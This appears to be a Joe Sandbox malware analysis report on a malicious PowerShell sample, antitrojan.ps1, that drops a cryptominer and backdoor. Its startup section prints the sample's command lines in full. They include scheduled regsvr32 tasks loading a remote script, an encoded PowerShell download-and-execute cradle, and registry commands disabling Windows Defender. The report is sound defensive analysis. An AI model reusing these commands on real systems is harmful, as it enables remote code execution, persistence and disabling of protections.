ID: 75218 Sample Name: antitrojan.ps1 Cookbook: default.jbs Time: 05:05:26 Date: 04/09/2018 Version: 23.0.0 Table of Contents

Table of Contents 2 Analysis Report antitrojan.ps1 5 Overview 5 General Information 5 Detection 5 Confidence 6 Classification 6 Analysis Advice 7 Signature Overview 7 AV Detection: 8 Exploits: 8 Bitcoin Miner: 8 Spreading: 8 Networking: 8 System Summary: 8 Data Obfuscation: 9 Persistence and Installation Behavior: 9 Boot Survival: 9 Hooking and other Techniques for Hiding and Protection: 9 Malware Analysis System Evasion: 9 Anti Debugging: 10 HIPS / PFW / Operating System Protection Evasion: 10 Language, Device and Operating System Detection: 10 Lowering of HIPS / PFW / Operating System Security Settings: 10 Remote Access Functionality: 10 Behavior Graph 10 Simulations 11 Behavior and APIs 11 Antivirus Detection 11 Initial Sample 11 Dropped Files 11 Unpacked PE Files 12 Domains 12 URLs 12 Yara Overview 12 Initial Sample 12 PCAP (Network Traffic) 12 Dropped Files 12 Memory Dumps 13 Unpacked PEs 13 Joe Sandbox View / Context 14 IPs 14 Domains 14 ASN 14 Dropped Files 14 Screenshots 15 Startup 15 Created / dropped Files 16 Domains and IPs 19 Contacted Domains 19 Contacted URLs 19 URLs from Memory and Binaries 19 Contacted IPs 20 Public 21

Copyright Joe Security LLC 2018 Page 2 of 50 Private 21 Static File Info 23 General 23 File Icon 23 Network Behavior 23 Network Port Distribution 23 TCP Packets 23 UDP Packets 25 ICMP Packets 26 DNS Queries 26 DNS Answers 26 HTTP Request Dependency Graph 27 HTTP Packets 27 Code Manipulations 32 Statistics 32 Behavior 32 System Behavior 33 Analysis Process: powershell.exe PID: 3268 Parent PID: 3064 33 General 33 File Activities 33 File Created 33 File Deleted 34 File Written 34 File Read 37 Registry Activities 40 Key Value Created 40 Analysis Process: netsh.exe PID: 3436 Parent PID: 3268 40 General 40 Registry Activities 40 Analysis Process: netsh.exe PID: 3464 Parent PID: 3268 40 General 40 Analysis Process: netsh.exe PID: 3484 Parent PID: 3268 41 General 41 Analysis Process: netsh.exe PID: 3512 Parent PID: 3268 41 General 41 Analysis Process: netsh.exe PID: 3548 Parent PID: 3268 41 General 41 Analysis Process: netsh.exe PID: 3592 Parent PID: 3268 42 General 42 Analysis Process: schtasks.exe PID: 3780 Parent PID: 3268 42 General 42 Analysis Process: schtasks.exe PID: 3796 Parent PID: 3268 42 General 42 Analysis Process: schtasks.exe PID: 3808 Parent PID: 3268 42 General 42 Analysis Process: taskeng.exe PID: 3816 Parent PID: 848 43 General 43 Analysis Process: powercfg.exe PID: 3828 Parent PID: 3268 43 General 43 Analysis Process: powercfg.exe PID: 3840 Parent PID: 3268 43 General 43 Analysis Process: regsvr32.exe PID: 3876 Parent PID: 3816 44 General 44 Analysis Process: powercfg.exe PID: 3892 Parent PID: 3268 44 General 44 Analysis Process: regsvr32.exe PID: 3884 Parent PID: 3816 44 General 44 Analysis Process: NETSTAT.EXE PID: 3900 Parent PID: 3268 44 General 45 Analysis Process: csc.exe PID: 3968 Parent PID: 3268 45 General 45 Analysis Process: NETSTAT.EXE PID: 4004 Parent PID: 3268 45 Copyright Joe Security LLC 2018 Page 3 of 50 General 45 Analysis Process: cmd.exe PID: 4040 Parent PID: 3876 45 General 45 Analysis Process: powershell.exe PID: 1828 Parent PID: 4040 46 General 46 Analysis Process: cmd.exe PID: 2120 Parent PID: 3884 46 General 46 Analysis Process: powershell.exe PID: 2216 Parent PID: 2120 46 General 46 Analysis Process: reg.exe PID: 2504 Parent PID: 1828 47 General 47 Analysis Process: reg.exe PID: 2656 Parent PID: 1828 47 General 47 Analysis Process: reg.exe PID: 2660 Parent PID: 1828 47 General 47 Analysis Process: cohernece.exe PID: 2664 Parent PID: 3268 48 General 48 Analysis Process: findstr.exe PID: 2324 Parent PID: 3268 48 General 48 Analysis Process: reg.exe PID: 1396 Parent PID: 1828 48 General 48 Analysis Process: cohernece.exe PID: 1340 Parent PID: 2664 49 General 49 Analysis Process: findstr.exe PID: 756 Parent PID: 3268 49 General 49 Analysis Process: powershell.exe PID: 2396 Parent PID: 3268 49 General 49 Analysis Process: NETSTAT.EXE PID: 2648 Parent PID: 3268 50 General 50 Analysis Process: reg.exe PID: 2212 Parent PID: 2216 50 General 50 Disassembly 50 Code Analysis 50

Copyright Joe Security LLC 2018 Page 4 of 50 Analysis Report antitrojan.ps1

Overview

General Information

Joe Sandbox Version: 23.0.0 Analysis ID: 75218 Start date: 04.09.2018 Start time: 05:05:26 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 7m 41s Hypervisor based Inspection enabled: false Report type: light Sample file name: antitrojan.ps1 Cookbook file name: default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 41 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled Analysis stop reason: Timeout Detection: MAL Classification: mal100.winPS1@70/16@13/100 EGA Information: Successful, ratio: 100% HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Found application associated with file extension: .ps1 Warnings: Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiApSrv.exe, WmiPrvSE.exe TCP Packets have been reduced to 100 Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, powershell.exe, powershell.exe

Detection

Strategy Score Range Reporting Detection

Copyright Joe Security LLC 2018 Page 5 of 50 Strategy Score Range Reporting Detection

Threshold 100 0 - 100 Report FP / FN

Confidence

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Classification

Copyright Joe Security LLC 2018 Page 6 of 50 Ransomware

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

• AV Detection • Exploits • Bitcoin Miner • Spreading • Networking • System Summary • Data Obfuscation Copyright Joe Security LLC 2018 Page 7 of 50 • Persistence and Installation Behavior • Boot Survival • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection • Lowering of HIPS / PFW / Operating System Security Settings • Remote Access Functionality

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Antivirus detection for unpacked file

Yara signature match

Exploits:

Connects to many different private IPs (likely to spread or exploit)

Connects to many different private IPs via SMB (likely to spread or exploit)

Bitcoin Miner:

DNS related to crypt mining pools

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Enumerates the file system

Networking:

Detected TCP or UDP traffic on non-standard ports

Uses netstat to query active network connections and open ports

HTTP GET or POST without a user agent

Uses a known web browser user agent for HTTP communication

Downloads files

Downloads files from webservers via HTTP

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS

System Summary:

Blacklisted process start detected (Windows program)

Powershell connects to network

Copyright Joe Security LLC 2018 Page 8 of 50 Powershell drops PE file

Uses powercfg.exe to modify the power settings

Abnormal high CPU Usage

Contains functionality to call native functions

Creates files inside the system directory

Creates mutexes

Reads the hosts file

Tries to load missing DLLs

Uses reg.exe to modify the Windows registry

PE file contains only one section

Classification label

Creates files inside the user directory

Creates temporary files

Found command line output

Parts of this applications are using Borland Delphi (Probably coded in Delphi)

Parts of this applications are using the .NET runtime (Probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Sample is known by Antivirus

Spawns processes

Uses an in-process (OLE) Automation server

Found graphical window changes (likely an installer)

Uses Microsoft Silverlight

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Binary contains paths to debug symbols

Data Obfuscation:

Suspicious powershell command line found

Compiles C# or VB.Net code

Entry point lies outside standard sections

PE file contains an invalid checksum

Registers a DLL

Persistence and Installation Behavior:

Creates files in the system32 config directory

Uses cmd line tools excessively to alter registry or file data

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Creates or modifies windows services

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Malware Analysis System Evasion:

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Copyright Joe Security LLC 2018 Page 9 of 50 Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enumerates the file system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries a list of all running drivers

Queries a list of all running processes

Anti Debugging:

Potentially malicious time measurement code found

Tries to detect sandboxes and other dynamic analysis tools (window names)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates guard pages, often used to prevent reverse engineering and debugging

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Encrypted powershell cmdline option found

Executes SCT (Windows Script Component) via regsvr32

Modifies the context of a thread in another process (thread injection)

Sets debug register (to hijack the execution of another thread)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Language, Device and Operating System Detection:

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Queries the cryptographic machine GUID

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies power options to not sleep / hibernate

Uses netsh to modify the Windows network and firewall settings

Remote Access Functionality:

Found post-exploitation toolkit Empire

Behavior Graph

Copyright Joe Security LLC 2018 Page 10 of 50 Hide Legend Legend:

Behavior Graph ID: 75218 Process Sample: antitrojan.ps1 Startdate: 04/09/2018 Architecture: WINDOWS Signature Score: 100 Created File

Multi AV Scanner detection Antivirus detection Antivirus detection 14 other signatures started started for domain / URL for URL or domain for dropped file DNS/IP Info Is Dropped powershell.exe taskeng.exe Is Windows Process 13 14 Number of created Registry Values

192.168.2.1 192.168.2.10 dropped dropped unknown unknown 100 other IPs or domains unknown unknown Number of created Files Visual Basic C:\Users\user\AppData\...\java-log-9527.log, PE32 C:\Users\user\AppData\Local\...\cohernece.exe, PE32 started started started started started Delphi

System process connects Connects to many different Connects to many different Executes SCT (Windows to network (likely due private IPs via SMB private IPs (likely 4 other signatures Script Component) via to code injection or (likely to spread or to spread or exploit) regsvr32 exploit) exploit) Java .Net C# or VB.NET cohernece.exe powershell.exe netsh.exe regsvr32.exe regsvr32.exe 17 other processes C, C++ or other language 49 Is malicious

System process connects Tries to detect sandboxes Blacklisted process Antivirus detection Multi AV Scanner detection to network (likely due Powershell connects Creates files in the and other dynamic analysis 4 other signatures started start detected (Windows started started for dropped file for dropped file to code injection or to network system32 config directory tools (window names) program) exploit)

cohernece.exe cmd.exe cmd.exe

Suspicious powershell Encrypted powershell started started command line found cmdline option found

powershell.exe powershell.exe

System process connects Uses cmd line tools to network (likely due Powershell connects excessively to alter started started started started started to code injection or to network registry or file data exploit)

reg.exe reg.exe reg.exe reg.exe reg.exe

Simulations

Behavior and APIs

Time Type Description 05:05:43 API Interceptor 101x Sleep call for process: powershell.exe modified 05:05:56 API Interceptor 12x Sleep call for process: netsh.exe modified 05:06:14 API Interceptor 6x Sleep call for process: schtasks.exe modified 05:06:15 Task Scheduler Run new task: System Log Security Check path: regsvr32 s>/u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll 05:26:00 Task Scheduler Run new task: WindowsLogTasks path: regsvr32 s>/u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll 05:26:00 API Interceptor 3x Sleep call for process: powercfg.exe modified 05:26:01 API Interceptor 3x Sleep call for process: taskeng.exe modified 05:26:02 API Interceptor 3x Sleep call for process: NETSTAT.EXE modified 05:26:08 API Interceptor 872x Sleep call for process: regsvr32.exe modified 05:26:25 API Interceptor 2x Sleep call for process: cohernece.exe modified

Antivirus Detection

Initial Sample

Source Detection Scanner Label Link antitrojan.ps1 26% virustotal Browse

Dropped Files

Copyright Joe Security LLC 2018 Page 11 of 50 Source Detection Scanner Label Link C:\Users\user\AppData\Local\Temp\java-log-9527.log 100% Avira HEUR/AGEN.1018755 C:\Users\user\AppData\Local\Temp\cohernece.exe 100% Avira TR/Skillis.ojelt C:\Users\user\AppData\Local\Temp\cohernece.exe 74% virustotal Browse C:\Users\user\AppData\Local\Temp\java-log-9527.log 82% virustotal Browse C:\Users\user\AppData\Local\Temp\java-log-9527.log 66% metadefender Browse

Unpacked PE Files

Source Detection Scanner Label Link 32.2.cohernece.exe.400000.0.unpack 100% Avira DR/Delphi.Gen2 35.1.cohernece.exe.400000.0.unpack 100% Avira HEUR/AGEN.1018755 35.0.cohernece.exe.400000.6.unpack 100% Avira TR/Patched.Ren.Gen

Domains

Source Detection Scanner Label Link f4keu.7h4uk.com 7% virustotal Browse

URLs

Source Detection Scanner Label Link https://update.7h4uk.com:443/logos.png 0% Avira URL Cloud safe http://update.7h4uk.( 0% Avira URL Cloud safe http://185.128.43.62 9% virustotal Browse http://185.128.43.62 0% Avira URL Cloud safe http://185.128.43.62/eop.ps1 12% virustotal Browse http://185.128.43.62/eop.ps1 100% Avira URL Cloud malware http://crl.starf 0% Avira URL Cloud safe https://update.7h4uk.com:443/antivirus.php 0% Avira URL Cloud safe http://185.128.43.62/eop.ps1t 0% Avira URL Cloud safe http://update.7h4uk.com:443/cohernece.txt 0% Avira URL Cloud safe http://$nic/antitrojan.ps1t 0% Avira URL Cloud safe http://$nic/antivirus.ps1t 0% Avira URL Cloud safe https://update.7h4uk.com:443/ver.txt 0% Avira URL Cloud safe http://nic/antivirus.ps1Tn 0% Avira URL Cloud safe http://$nic/antitrojan.ps1 0% Avira URL Cloud safe https://update.7h4uk.com:443/cohernece.txt 0% Avira URL Cloud safe http://$nic/antivirus.ps1 0% Avira URL Cloud safe http://update.7h4uk.com:443/antivirus.php 10% virustotal Browse http://update.7h4uk.com:443/antivirus.php 100% Avira URL Cloud malware http://nic/antivirus.ps1T 0% Avira URL Cloud safe http://nic/antitrojan.ps1T 0% Avira URL Cloud safe http://update.7h4uk. 0% Avira URL Cloud safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source Rule Description Author C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary PowerShell_Susp_Parameter Detects PowerShell Florian Roth Internet Files\Content.IE5\antivirus[2].php _Combo invocation with suspicious parameters C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary PowerShell_Susp_Parameter Detects PowerShell Florian Roth Internet Files\Content.IE5\antivirus[1].php _Combo invocation with suspicious parameters

Copyright Joe Security LLC 2018 Page 12 of 50 Source Rule Description Author C:\Users\user\AppData\Local\Temp\java-log-9527.log ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group C:\Users\user\AppData\Local\Temp\java-log-9527.log Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader C:\Users\user\AppData\Local\Temp\java-log-9527.log CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set

Memory Dumps

Source Rule Description Author 00000023.00000001.1900742410.00400000.00000040.sdmp ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 00000023.00000001.1900742410.00400000.00000040.sdmp Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 00000023.00000001.1900742410.00400000.00000040.sdmp CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 0000001C.00000002.1931665079.000B4000.00000004.sdmp PowerShell_Susp_Parameter Detects PowerShell Florian Roth _Combo invocation with suspicious parameters 0000001C.00000002.1931632180.00090000.00000004.sdmp PowerShell_Susp_Parameter Detects PowerShell Florian Roth _Combo invocation with suspicious parameters 00000001.00000003.1684190923.02432000.00000004.sdmp PowerShell_Mal_HackTool_G Detects PowerShell hack tool Florian Roth en samples - generic PE loader 00000020.00000003.1893324898.00310000.00000040.sdmp ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 00000020.00000003.1893324898.00310000.00000040.sdmp Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 00000020.00000003.1893324898.00310000.00000040.sdmp CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 00000023.00000000.1793672754.00400000.00000040.sdmp ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 00000023.00000000.1793672754.00400000.00000040.sdmp Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 00000023.00000000.1793672754.00400000.00000040.sdmp CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 00000019.00000002.1929086913.000B4000.00000004.sdmp PowerShell_Susp_Parameter Detects PowerShell Florian Roth _Combo invocation with suspicious parameters 00000019.00000002.1928783139.00090000.00000004.sdmp PowerShell_Susp_Parameter Detects PowerShell Florian Roth _Combo invocation with suspicious parameters

Unpacked PEs

Source Rule Description Author 32.3.cohernece.exe.310000.0.raw.unpack ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 32.3.cohernece.exe.310000.0.raw.unpack Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 32.3.cohernece.exe.310000.0.raw.unpack CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 35.1.cohernece.exe.400000.0.unpack ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group

Copyright Joe Security LLC 2018 Page 13 of 50 Source Rule Description Author 35.1.cohernece.exe.400000.0.unpack Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 35.1.cohernece.exe.400000.0.unpack CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 32.3.cohernece.exe.310000.0.unpack ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 32.3.cohernece.exe.310000.0.unpack Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 32.3.cohernece.exe.310000.0.unpack CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 35.1.cohernece.exe.400000.0.raw.unpack ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 35.1.cohernece.exe.400000.0.raw.unpack Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 35.1.cohernece.exe.400000.0.raw.unpack CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set 35.0.cohernece.exe.400000.6.raw.unpack ZxShell_Related_Malware_C Detects a ZxShell related Florian Roth N_Group_Jul17_2 sample from a CN threat group 35.0.cohernece.exe.400000.6.raw.unpack Backdoor_Nitol_Jun17 Detects malware backdoor Florian Roth Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader 35.0.cohernece.exe.400000.6.raw.unpack CN_disclosed_20180208_Mal Detects malware from Florian Roth 1 disclosed CN malware set

Joe Sandbox View / Context

IPs

No context

Domains

Associated Sample Match Name / URL SHA 256 Detection Link Context xmr-eu1.nanopool.org in3.ps1 f6e75f0346425209c92217da882f malicious Browse 5.196.23.240 ca45d7004e683c8122a48a7b3bc ec5356e1d info3.ps1 e92251cb5557d832c64143e30c4 malicious Browse 51.255.34.118 948781f60e7d19deac2fcd3b6776 1abdd2357 v1.exe d7c38aac3bc4c6a47f627d336fb0 malicious Browse 5.196.23.240 a44b3237fa80cf2d8c1d77f619f70 d041c8e 3.exe 58795849f8c43713aea839e7660 malicious Browse 164.132.109.110 998863f58793a14e3c2a8325d91 4a1a9aea4b

ASN

No context

Dropped Files

No context

Copyright Joe Security LLC 2018 Page 14 of 50 Screenshots

Startup

Copyright Joe Security LLC 2018 Page 15 of 50 System is w7 powershell.exe (PID: 3268 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ant itrojan.ps1' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) netsh.exe (PID: 3436 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3464 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3484 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3512 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp descri ption=445 MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3548 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3592 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y MD5: 784A50A6A09C25F011C3143DDD68E729) schtasks.exe (PID: 3780 cmdline: 'C:\Windows\system32\schtasks.exe' /create /tn WindowsLogTasks /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc onstart /ru System /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3) schtasks.exe (PID: 3796 cmdline: 'C:\Windows\system32\schtasks.exe' /create /tn 'System Log Security Check' /tr 'regsvr32 /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll' /sc minute /mo 20 /ru System /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3) schtasks.exe (PID: 3808 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3) powercfg.exe (PID: 3828 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3840 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3892 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) NETSTAT.EXE (PID: 3900 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) csc.exe (PID: 3968 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D) NETSTAT.EXE (PID: 4004 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) cohernece.exe (PID: 2664 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe MD5: 4FE2DE6FBB278E56C23E90432F21F6C8) cohernece.exe (PID: 1340 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe MD5: 4FE2DE6FBB278E56C23E90432F21F6C8) findstr.exe (PID: 2324 cmdline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight c:\windows\explorer.exe MD5: 18F02C555FBC9885DF9DB77754D6BB9B) findstr.exe (PID: 756 cmdline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight 'c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\ospp svc.exe' MD5: 18F02C555FBC9885DF9DB77754D6BB9B) powershell.exe (PID: 2396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:System_Anti_Vir us_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([Syste m.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) NETSTAT.EXE (PID: 2648 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) taskeng.exe (PID: 3816 cmdline: taskeng.exe {639D9766-C719-4F35-A71E-727C31918952} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407) regsvr32.exe (PID: 3876 cmdline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll MD5: 432BE6CF7311062633459EEF6B242FB5) cmd.exe (PID: 4040 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG 4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC 4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: AD7B9C14083B52BC532FBA5948342B98) powershell.exe (PID: 1828 cmdline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwB lAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4AN AAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA) reg.exe (PID: 2504 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v Disable AntiSpyware /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) reg.exe (PID: 2656 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time P rotection' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) reg.exe (PID: 2660 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time P rotection' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) reg.exe (PID: 1396 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time P rotection' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) regsvr32.exe (PID: 3884 cmdline: C:\Windows\system32\regsvr32.EXE /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll MD5: 432BE6CF7311062633459EEF6B242FB5) cmd.exe (PID: 2120 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG 4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC 4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: AD7B9C14083B52BC532FBA5948342B98) powershell.exe (PID: 2216 cmdline: powershell.exe -nop -noni -w hidden -enc 